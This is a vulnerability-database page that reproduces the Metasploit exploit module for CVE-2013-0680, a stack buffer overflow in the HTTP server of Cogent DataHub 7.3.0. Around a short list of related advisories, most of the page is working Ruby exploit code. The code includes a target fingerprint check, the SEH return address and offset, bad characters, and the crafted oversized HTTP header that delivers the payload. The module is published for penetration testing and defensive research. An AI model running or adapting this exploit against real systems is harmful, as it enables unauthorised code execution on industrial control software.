Lucene search
K

Cogent DataHub HTTP Server Buffer Overflow

🗓️ 16 Aug 2013 23:13:18Reported by rgod <[email protected]>, juan vazquez <[email protected]>Type 
metasploit
 metasploit
🔗 www.rapid7.com👁 21 Views

Cogent DataHub HTTP Server Buffer Overflow on Cogent DataHub 7.3.0 (Demo) on Windows XP SP3. Exploits stack based buffer overflow in HTTP server handling HTTP headers

Related
Code
ReporterTitlePublishedViews
Family
Circl
CVE-2013-0680
29 May 201815:50
circl
CVE
CVE-2013-0680
5 Apr 201321:00
cve
Cvelist
CVE-2013-0680
5 Apr 201321:00
cvelist
ICS
Cogent Real-Time Systems Vulnerabilities
7 Jan 201307:00
ics
NVD
CVE-2013-0680
5 Apr 201321:55
nvd
OpenVAS
Cogent DataHub Multiple Vulnerabilities - Active Check
16 Apr 201300:00
openvas
Prion
Stack overflow
5 Apr 201321:55
prion
RedhatCVE
CVE-2013-0680
22 May 202511:09
redhatcve
Tenable Nessus
Cogent DataHub < 7.3.0 Multiple Vulnerabilities
22 Oct 201300:00
nessus
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit::Remote
  Rank = NormalRanking

  include Msf::Exploit::Remote::HttpClient
  include Msf::Exploit::Remote::Seh

  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'Cogent DataHub HTTP Server Buffer Overflow',
      'Description'    => %q{
        This module exploits a stack based buffer overflow on Cogent DataHub 7.3.0. The
        vulnerability exists in the HTTP server. While handling HTTP headers, a
        strncpy() function is used in a dangerous way. This module has been tested
        successfully on Cogent DataHub 7.3.0 (Demo) on Windows XP SP3.
      },
      'Author'         =>
        [
          'rgod <rgod[at]autistici.org>',	# Vulnerability discovery
          'juan vazquez', # Metasploit module
        ],
      'License'        => MSF_LICENSE,
      'References'     =>
        [
          [ 'CVE', '2013-0680' ],
          [ 'OSVDB', '95819'],
          [ 'BID', '53455'],
          [ 'ZDI', '13-178' ],
          [ 'URL', 'http://www.cogentdatahub.com/Info/130712_ZDI-CAN-1915_Response.html']
        ],
      'DefaultOptions' =>
        {
          'EXITFUNC' => 'process',
        },
      'Privileged'     => false,
      'Payload'        =>
        {
          'Space'       => 33692,
          'DisableNops' => true,
          'BadChars'    => "\x00\x0d\x0a\x3a"
        },
      'Platform'       => 'win',
      'Targets'        =>
        [
          # Tested with the Cogent DataHub 7.3.0 Demo
          # CogentDataHubV7.exe 7.3.0.70
          ['Windows XP SP3 English / Cogent DataHub 7.3.0',
            {
              'Ret'         => 0x7ffc070e, # ppr # from NLS tables # Tested stable over Windows XP SP3 updates
              'Offset'      => 33692,
              'CrashLength' => 4000 # In order to ensure crash before the stack cookie check
            }
          ],
        ],
      'DefaultTarget'  => 0,
      'DisclosureDate' => '2013-07-26'
    ))

  end

  def check
    res = send_request_cgi({
      'uri'          => "/datahub.asp",
      'method'       => 'GET',
    })

    if res and res.code == 200 and res.body =~ /<title>DataHub - Web Data Browser<\/title>/
      return Exploit::CheckCode::Detected
    end

    return Exploit::CheckCode::Safe
  end

  def exploit
    print_status("Trying target #{target.name}...")

    off = target['Offset'] + 8 # 8 => length of the seh_record
    bof = payload.encoded
    bof << rand_text_alpha(target['Offset'] - payload.encoded.length)
    bof << generate_seh_record(target.ret)
    bof << Metasm::Shellcode.assemble(Metasm::Ia32.new, "jmp $-" + off.to_s).encode_string
    bof << rand_text(target['CrashLength'])

    print_status("Sending request to #{rhost}:#{rport}")

    send_request_cgi({
      'uri'          => "/",
      'method'       => 'GET',
      'raw_headers'  => "#{bof}: #{rand_text_alpha(20 + rand(20))}\r\n"
    })

  end
end

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation